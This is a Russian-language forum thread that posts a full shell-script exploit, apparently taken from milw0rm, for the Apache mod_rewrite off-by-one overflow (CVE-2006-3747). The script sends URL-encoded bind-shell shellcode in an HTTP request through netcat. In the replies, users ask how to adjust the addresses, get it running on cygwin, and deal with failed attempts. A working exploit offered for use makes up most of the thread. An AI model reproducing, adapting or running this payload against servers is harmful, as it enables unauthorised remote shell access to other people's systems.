Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC. Обсуждение

Discussion in 'Безопасность и Анонимность' started by melco, 25 Sep 2006.

  1. melco

    melco Member

    Joined:
    11 Sep 2005
    Messages:
    11
    Likes Received:
    5
    Reputations:
    2
    #!/bin/sh
    # Exploit for Apache mod_rewrite off-by-one.
    # Vulnerability discovered by Mark Dowd.
    # CVE-2006-3747
    #
    # by jack <jack\x40gulcas\x2Eorg>
    # 2006-08-20
    #
    # Thx to xuso for help me with the shellcode.
    #
    # I suppose that you've the "RewriteRule kung/(.*) $1" rule if not
    # you must recalculate adressess.
    #
    # Shellcode is based on Taeho Oh bindshell on port 30464 and modified
    # for avoiding apache url-escape.. Take a look is quite nice ;)
    #
    # Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at
    # 0x0834ae77 for any other version/system find it.
    #
    # Gulcas rulez :p

    echo -e "mod_rewrite apache off-by-one overflow"
    echo "by jack <jack\x40gulcas\x2eorg>\n\n"

    if [ $# -ne 1 ] ; then
    echo "Usage: $0 webserver"
    exit
    fi

    host=$1

    echo -ne "GET /kung/ldap://localhost/`perl -e 'print "%90"x128'`%89%e6\
    %31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3\
    %01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04\
    %31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66\
    %b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31\
    %c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8\
    %23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76\
    %08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db\
    %cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\
    %77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\r\n\
    Host: $host\r\n\r\n" | nc $host 80

    # milw0rm.com [2006-08-21]


    Поясните, как подбирать адреса под что-то иное, нежели "RewriteRule kung/(.*) $1" и под что-то не "apache 1.3.34 (debian sarge)" ? Чисто технически как?
     
  2. fersa

    fersa New Member

    Joined:
    22 Feb 2007
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    А есть у когонить скомпилированный вариант :)
     
  3. [loy]

    [loy] Elder - Старейшина

    Joined:
    24 Mar 2006
    Messages:
    126
    Likes Received:
    23
    Reputations:
    16
    // береш линух и компилируеш
    или cygwin

    вставляеш в файлик me_fuck.sh и потом bash (ПУТЬКФАЙЛУ)me_fuck 127.0.0.1
     
  4. -Onotole-

    -Onotole- Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    44
    Likes Received:
    141
    Reputations:
    8
    я архиолог,помогите мне с этим сплойтом плз..обьясните что к чему...с меня + :)
     
  5. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    У меня не получается запускатся на cygwin
    ответ No such file or directory :confused:
     
  6. Wiedzmin

    Wiedzmin New Member

    Joined:
    29 Mar 2011
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    После запуска эксплойта melco сервер отвечает "Bad Request", версия Apache 2.2.3. С этим ничего нельзя поделать?
    P.S. сорри за некропостинг.
    P.P.S.
    Очевидно у тебя не установлен netcat =)